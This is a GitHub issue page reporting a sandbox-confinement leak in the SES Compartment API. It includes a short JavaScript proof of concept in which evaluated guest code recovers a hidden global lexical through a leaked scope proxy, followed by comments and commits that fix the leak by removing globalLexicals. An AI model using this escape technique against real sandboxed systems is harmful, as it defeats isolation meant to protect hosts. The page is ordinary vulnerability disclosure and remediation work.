Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Scope proxy leak allow constructive access to global lexicals #904

Closed
mhofman opened this issue Sep 22, 2021 · 1 comment · Fixed by #1343
Closed

Scope proxy leak allow constructive access to global lexicals #904

mhofman opened this issue Sep 22, 2021 · 1 comment · Fixed by #1343
Assignees
@mhofman
Labels
confinement Pertaining to confinement of guest programs. ses

Comments

@mhofman
Copy link
Contributor

mhofman commented Sep 22, 2021

A property of the globalLexicals option of the Compartment constructor is that they can only be accessed lexically, which can be denied to evaluated code by simple code transforms. However combined with the leak of scope proxy objects (#31), evaluate code can constructively reach the global lexicals.

const c = new Compartment({}, { globalLexicals: { foo() { return 'secret'; } });
c.evaluate(`
  globalThis.getThis = function() { return this; };
  const hiddenFoo = getThis()[['f', 'o', 'o'].join('')];
  hiddenFoo()
`);

Unlike #876 this affects all evaluators.
@mhofman mhofman added the confinement Pertaining to confinement of guest programs. label Sep 22, 2021
@mhofman mhofman mentioned this issue Sep 23, 2021
Closed
@mhofman mhofman self-assigned this Feb 7, 2022
@mhofman mhofman added the ses label Feb 8, 2022
@mhofman
Copy link
Contributor Author

mhofman commented Oct 26, 2022

Now that #1293 has landed, the global lexical leak can only happen through the lexicals created for module bindings which currently use the same object. #1341 should fix that.

@mhofman mhofman mentioned this issue Oct 26, 2022
Closed
kriskowal added a commit that referenced this issue Oct 26, 2022
@kriskowal
feat(ses)!: Remove support for globalLexicals
d5369f2 
Fixes #904

*BREAKING CHANGE*: Removes support for `globalLexicals`.  To our knowledge, there are no production uses for `globalLexicals`.  They currently could leak because `moduleLexicals` and `globalLexicals` used the same scope object, so properties of one would leak to the other with crafted modules.  We had an opportunity to plug the leak at the cost of a fifth scope in all evaluators, but elected to remove the unnecessary complexity instead.
@kriskowal kriskowal mentioned this issue Oct 26, 2022
Merged
kriskowal added a commit that referenced this issue Oct 27, 2022
@kriskowal
feat(ses)!: Remove support for globalLexicals
06598ed 
Fixes #904

*BREAKING CHANGE*: Removes support for `globalLexicals`.  To our knowledge, there are no production uses for `globalLexicals`.  They currently could leak because `moduleLexicals` and `globalLexicals` used the same scope object, so properties of one would leak to the other with crafted modules.  We had an opportunity to plug the leak at the cost of a fifth scope in all evaluators, but elected to remove the unnecessary complexity instead.
kriskowal added a commit that referenced this issue Oct 28, 2022
@kriskowal
feat(ses)!: Remove support for globalLexicals
3b90d5d 
Fixes #904

*BREAKING CHANGE*: Removes support for `globalLexicals`.  To our knowledge, there are no production uses for `globalLexicals`.  They currently could leak because `moduleLexicals` and `globalLexicals` used the same scope object, so properties of one would leak to the other with crafted modules.  We had an opportunity to plug the leak at the cost of a fifth scope in all evaluators, but elected to remove the unnecessary complexity instead.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@mhofman mhofman

Labels
confinement Pertaining to confinement of guest programs. ses
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

feat(ses)!: Remove support for globalLexicals endojs/endo
1 participant
@mhofman